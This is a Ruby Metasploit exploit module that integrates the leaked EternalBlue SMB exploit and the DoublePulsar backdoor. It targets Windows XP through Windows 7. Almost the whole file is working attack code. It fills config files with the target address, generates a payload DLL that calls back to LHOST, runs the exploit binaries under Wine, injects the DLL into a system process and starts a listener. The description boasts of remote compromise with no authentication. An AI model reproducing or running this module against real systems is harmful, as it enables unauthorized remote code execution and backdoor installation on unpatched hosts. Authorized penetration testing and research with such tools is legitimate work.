eternalblue_doublepulsar.rb

1. require 'msf/core'
2.  
3. class MetasploitModule < Msf::Exploit::Remote
4.  
5.   #include Msf::Exploit::Remote::DCERPC
6.   include Msf::Exploit::Remote::SMB::Client
7.  
8.   def initialize(info = {})
9.     super(update_info(info,
10.       'Name'        => 'EternalBlue',
11.       'Description' => %q{
12.           This module exploits a vulnerability on SMBv1/SMBv2 protocols through Eternalblue.
13.       After that, doublepulsar is used to inject remotely a malicious dll (it's will generate based on your       payload selection).
14.      You can use this module to compromise a host remotely (among the targets available) without needing         nor authentication neither target's user interaction.
15.       ** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, IT'S NOT THE FULL PORTATION **
16.     },
17.     'Author'      =>
18.       [
19.         'Pablo Gonzalez (@pablogonzalezpe)',
20.         'Sheila A. Berta (@UnaPibaGeek)'
21.       ],
22.        'Payload'        =>
23.       {
24.         'BadChars'   => "\x00\x0a\x0d",
25.       },
26.     'Platform'       => 'win',
27.     'DefaultTarget'  => 8,
28.     'Targets'        =>
29.       [
30.      ['Windows XP (all services pack) (x86) (x64)',{}],
31.      ['Windows Server 2003 SP0 (x86)',{}],
32.      ['Windows Server 2003 SP1/SP2 (x86)',{}],
33.      ['Windows Server 2003 (x64)',{}],
34.         ['Windows Vista (x86)',{}],
35.      ['Windows Vista (x64)',{}],
36.      ['Windows Server 2008 (x86) ',{}],
37.      ['Windows Server 2008 R2 (x86) (x64)',{}],
38.      ['Windows 7 (all services pack) (x86) (x64)',{}]
39.    ],
40.     'Arch'           => [ARCH_X86,ARCH_X64],
41.      'ExitFunc'       => 'thread',
42.      'Target'         => 0,
43.     'License'     => MSF_LICENSE,
44.        )
45.  
46.        )
47.  
48.    register_options([
49.        OptEnum.new('TARGETARCHITECTURE', [true,'Target Architecture','x86',['x86','x64']]),
50.        OptString.new('ETERNALBLUEPATH',[true,'Path directory of Eternalblue','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
51.        OptString.new('DOUBLEPULSARPATH',[true,'Path directory of Doublepulsar','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
52.        OptString.new('WINEPATH',[true,'WINE drive_c path','/root/.wine/drive_c/']),
53.        OptString.new('PROCESSINJECT',[true,'Name of process to inject into (Change to lsass.exe for x64)','wlms.exe'])
54.    ], self.class)
55.  
56. register_advanced_options([
57.   OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',60]),
58.   OptString.new('DLLName',[true,'DLL name for Doublepulsar','eternal11.dll'])
59. ], self.class)
60.  
61. end
62.  
63. def exploit
64.  
65. #Custom XML Eternalblue
66. print_status('Generating Eternalblue XML data')
67. cp = `cp #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.Skeleton.xml #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
68. sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
69.   sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
70.   sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
71.  
72.   #WIN72K8R2 (4-8) and XP (0-3)
73.   if target.name =~ /7|2008|Vista/
74.     objective = "WIN72K8R2"
75.   else
76.     objective = "XP"
77.   end
78.  
79.   sed = `sed -i 's/%TARGET%/#{objective}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
80.  
81.   #Custom XML Doublepulsar
82.   print_status('Generating Doublepulsar XML data')
83.   cp = `cp #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.Skeleton.xml #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
84.   sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
85.   sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
86.   sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
87.   sed = `sed -i 's/%TARGETARCHITECTURE%/#{datastore['TARGETARCHITECTURE']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
88.   dllpayload = datastore['WINEPATH'] + datastore['DLLName']
89.   dllpayload2 = dllpayload.gsub('/','\/')
90.   sed = `sed -i 's/%DLLPAY%/#{dllpayload2}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
91.   sed = `sed -i 's/%PROCESSINJECT%/#{datastore['PROCESSINJECT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
92.  
93.   #Generate DLL
94.   print_status("Generating payload DLL for Doublepulsar")
95.   pay = framework.modules.create(datastore['payload'])
96.   pay.datastore['LHOST'] = datastore['LHOST']
97.   dll = pay.generate_simple({'Format'=>'dll'})
98.   File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
99.     print_status("Writing DLL in #{dllpayload}")
100.     f.print dll
101.   end
102.  
103.   #Send Exploit + Payload Injection
104.   print_status('Launching Eternalblue...')
105.   output = `cd #{datastore['ETERNALBLUEPATH']}; wine Eternalblue-2.2.0.exe`
106.   if output =~ /=-=-WIN-=-=/
107.     print_good("Pwned! Eternalblue success!")
108.   elsif output =~ /Backdoor returned code: 10 - Success!/
109.     print_good("Backdoor is already installed")
110.   else
111.     print_error("Are you sure it's vulnerable?")
112.   end
113.   print_status('Launching Doublepulsar...')
114.   output2 = `cd #{datastore['DOUBLEPULSARPATH']}; wine Doublepulsar-1.3.1.exe`
115.   if output2 =~ /Backdoor returned code: 10 - Success!/
116.     print_good("Remote code executed... 3... 2... 1...")
117.   else
118.     print_error("Oops, something was wrong!")
119.   end  
120.  
121.   handler
122.  
123.  end
124.  
125. end